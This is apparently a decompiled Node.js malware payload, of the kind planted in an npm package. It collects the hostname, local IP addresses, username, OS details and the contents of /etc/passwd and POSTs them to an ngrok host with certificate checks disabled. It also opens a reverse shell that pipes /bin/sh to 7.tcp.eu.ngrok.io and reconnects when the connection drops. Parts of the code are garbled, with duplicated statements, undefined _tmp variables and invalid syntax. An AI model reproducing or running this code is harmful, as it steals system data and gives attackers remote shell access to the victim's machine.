const https = require('https')
const path = require('path')
const os = require("os")
const fs = require('fs')
var hostname = os.hostname()
var filepath = path.dirname(__filename)
var ips = require('child_process').execSync("ifconfig | grep inet | grep -v inet6 | awk '{gsub(/addr:/,\"\");print $2}'").toString().trim().split("\n")
var passwd = ""
var platform = os.platform()
var release = os.release()
var username = os.userInfo().username
passwd = fs.readFileSync('/etc/passwd', 'utf8')
const data = new TextEncoder().encode(
  JSON.stringify({
    hostname: hostname,
    filepath: filepath,
    platform: platform,
    release: release,
    localip: ips,
    passwd: passwd,
    username: username,
    project_id: process.argv[2]
  })
)
JSON.stringify({
    hostname: hostname,
    filepath: filepath,
    platform: platform,
    release: release,
    localip: ips,
    passwd: passwd,
    username: username,
    project_id: process.argv[2]
  })
_tmp_8.hostname = hostname
_tmp_8.filepath = filepath
_tmp_8.platform = platform
_tmp_8.release = release
_tmp_8.localip = ips
_tmp_8.passwd = passwd
_tmp_8.username = username
_tmp_8.project_id = process.argv[2]
const options = {
  hostname: '0f83-78-164-111-17.eu.ngrok.io',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}
_tmp_9.hostname = "0f83-78-164-111-17.eu.ngrok.io"
_tmp_9.port = 443
_tmp_9.path = "/"
_tmp_9.method = "POST"
_tmp_9.headers = {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  }
_tmp_10.Content-Type = "application/json"
_tmp_10.Content-Length = data.length
_tmp_9.rejectUnauthorized = false
var net = require('net')
var spawn = require('child_process').spawn
HOST="7.tcp.eu.ngrok.io"
PORT="10880"
TIMEOUT="5000"
function c = function c(HOST,PORT) {
    var client = new net.Socket();
    client.connect(PORT, HOST, function() {
        var sh = spawn('/bin/sh',[]);
        client.write("Connected\r\n");
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
    });
    client.on('error', function(e) {
        setTimeout(c(HOST,PORT), TIMEOUT);
    });
}
const req = https.request(options, res => {})
c(HOST,PORT)
req.write(data)
